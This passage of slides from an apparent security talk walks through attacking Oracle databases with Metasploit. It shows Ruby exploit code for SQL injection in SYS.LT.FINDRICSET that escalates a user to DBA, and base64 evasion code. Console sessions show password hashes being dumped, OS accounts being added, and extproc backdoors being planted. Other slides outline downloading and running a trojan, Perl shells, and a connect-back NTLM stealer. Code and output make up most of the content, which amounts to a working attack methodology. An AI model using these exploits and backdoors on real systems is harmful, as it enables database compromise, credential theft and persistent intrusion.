SQL Injection in default Oracle packages.
A good chunk of it executable by public!
Regular SQLI requires CREATE PROCEDURE privilege
which most default accounts possess.
Cursor SQLI only requires CREATE SESSION privilege.
30. Privilege Escalation
The code.
name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
function =
"CREATE OR REPLACE FUNCTION #{name} RETURN NUMBER
AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE '#{datastore['SQL'].upcase}'; COMMIT;
RETURN(0);
END;"
31. Privilege Escalation
The code.
package ="BEGIN
SYS.LT.FINDRICSET('.'' #{datastore
['DBUSER']}.#{name}||'''')--',''); END;"
clean = "DROP FUNCTION #{name}"
....
print_status("Sending first function...")
prepare_exec(function)
print_status("Attempting sql injection on SYS.LT.FINDRICSET...")
prepare_exec(package)
print_status("Removing function '#{name}'...")
prepare_exec(clean)
....
32. Privilege Escalation
The set-up.
msf auxiliary(lt_findricset) > set RHOST 172.10.1.109
RHOST => 172.10.1.109
msf auxiliary(lt_findricset) > set RPORT 1521
RPORT => 1521
msf auxiliary(lt_findricset) > set DBUSER SCOTT
DBUSER => SCOTT
msf auxiliary(lt_findricset) > set DBPASS TIGER
DBPASS => TIGER
msf auxiliary(lt_findricset) > set SID ORCL
SID => ORACLE
msf auxiliary(lt_findricset) > set SQL GRANT DBA TO SCOTT
SQL => GRANT DBA TO SCOTT
33. Privilege Escalation
Attacking SYS.LT.FINDRICSET.
msf auxiliary(lt_findricset) > set SQL "grant dba to scott"
SQL => grant dba to scott
msf auxiliary(lt_findricset) > run
[*] Sending first function...
[*] Done...
[*] Attempting sql injection on SYS.LT.FINDRICSET...
[*] Done...
[*] Removing function 'NBVFICZ'...
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(lt_findricset) >
36. Privilege Escalation
This Can Be Solved By Implementing Some
Basic Evasion.
dos = Rex::Text.encode_base64(package)
Which Is Then Decoded On The Remote Side.
DECLARE
#{rand2} VARCHAR2(32767);
BEGIN
#{rand2} :=
utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));
EXECUTE IMMEDIATE #{rand2}; END;
40. Oracle Attack Methodology
Locate a system running Oracle.
Determine Oracle Version.
Determine Oracle SID.
Guess/Bruteforce USER/PASS.
Privilege Escalation via SQL Injection.
Manipulate Data/Post Exploitation.
Cover Tracks.
41. Post Exploitation
If all I want is the Data after SQLI to DBA we are
probably done.
sql.rb to run SQL commands.
msf auxiliary(sql) > set SQL "select username,password,account_status from
dba_users”
SQL => select username,password,account_status from dba_users
msf auxiliary(sql) > run
[*] Sending SQL...
[*] SYS,7087B7E95718C0CC,OPEN
[*] SYSTEM,66DC0F914CDD83F3,OPEN
[*] DBSNMP,E066D214D5421CCC,OPEN
[*] SCOTT,F894844C34402B67,OPEN
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(sql) >
42. Post Exploitation
Data is nice, but shells are better
Several published methods for running OS
commands via oracle libraries.
Via Java.
Extproc backdoors.
Dbms_Scheduler.
Run custom pl/sql or java.
43. Post Exploitation
Win32Exec
Grant user JAVASYSPRIVS using sql.rb.
Run win32exec.rb to run system commands.
Examples
Net User Add
TFTP get trojan.exe → execute trojan.exe
FTP Batch Scripts
Net User Add → metasploit psexec exploit
Ref: http://0xdeadbeef.info/exploits/raptor_oraexec.sql
Ref: Oracle Hacker’s Handbook
44. Post Exploitation
Win32Exec
msf auxiliary(win32exec) > set CMD "net user dba P@ssW0rd1234
/add“
CMD => net user dba P@ssW0rd1234 /add
msf auxiliary(win32exec) > run
[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'net user dba P@ssW0rd1234 /add‘
[*] Done...
[*] Auxiliary module execution completed
46. Post Exploitation
FTP Upload
Echo over FTP batch script via UTL_FILE, use
DBMS_Scheduler to run the script and execute the
malware.
Demo Video at:
http://vimeo.com/2704188
Ref: Red Database Security
Ref: http://www.red-database-security.com/wp/oracle_cheat.pdf
47. Post Exploitation
Perl Backdoor
Oracle installs perl with every install.
Use UTL_FILE to echo over perl shell line by line.
Use one of the other tools to execute perl shell.
Easy to use with *nix
Ref: Red Database Security
48. Post Exploitation
Extproc Backdoor via directory traversal.
Allows you to call libraries outside of
oracle root.
Nix and win32.
CVE 2004-1364
9.0.1.1 – 9.0.1.5
9.2.0.1 – 9.2.0.5
10.1.0.2
Ref: http://0xdeadbeef.info/exploits/raptor_oraextproc.sql
49. Post Exploitation
Extproc Backdoor via directory traversal.
msf auxiliary(extproc_backdoor_traversal) > set CMD “net user
metasploit metasploit /add”
CMD => net user metasploit metasploit /add
msf auxiliary(extproc_backdoor_traversal) > run
[*] Setting up extra required permissions
[*] Done...
[*] Set msvcrt.dll location to
C:oracleora92bin../../../Windowssystem32msvcrt.dll
[*] Done...
[*] Setting extproc backdoor
[*] Running command net user metasploit metasploit /add
[*] Done…
[*] Auxiliary module execution complete
51. Post Exploitation
Extproc Backdoor via copy dll.
“newer” versions will allow you to just copy over
the dll into the %ORACLE_HOME%bin directory.
CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:Windowssystem32';
CREATE OR REPLACE DIRECTORY copy_dll_to AS
'C:Oracleproduct10.1.0db_1BIN';
…
CREATE OR REPLACE LIBRARY extproc_shell AS
'C:Oracleproduct10.1.0db_1binmsvcrt.dll'; /
Works on newer Oracle 10g/11g.
Ref: Digital Security Research Group
Ref: http://milw0rm.org/exploits/7675
52. Post Exploitation
Win32upload
Grant user JAVASYSPRIVS using sql.rb.
Run win32upload.rb to download binary from a remote
webserver
Run win32exec.rb to execute the binary
Ref: Argeniss Advanced SQL Injection in Oracle Databases (Black Hat USA 2005)
Ref: http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip
53. Post Exploitation
DBMS_Schedule Backdoor
Run OS commands via DBMS_Scheduler.
Module written by Alexandr Polyakov of Digital
Security Research Group.
Will be added to svn soon.
54. Post Exploitation
Oracle NTLM Stealer
Oracle running as admin user not SYSTEM.
Have Oracle connect back to MSF, grab halfLM
challenge or perform SMB Relay attack.
Module writers did a great write up on using the
module and when it would be useful.
http://www.dsecrg.com/files/pub/pdf/Penetration_from_application_down_t
o _OS_(Oracle%20database).pdf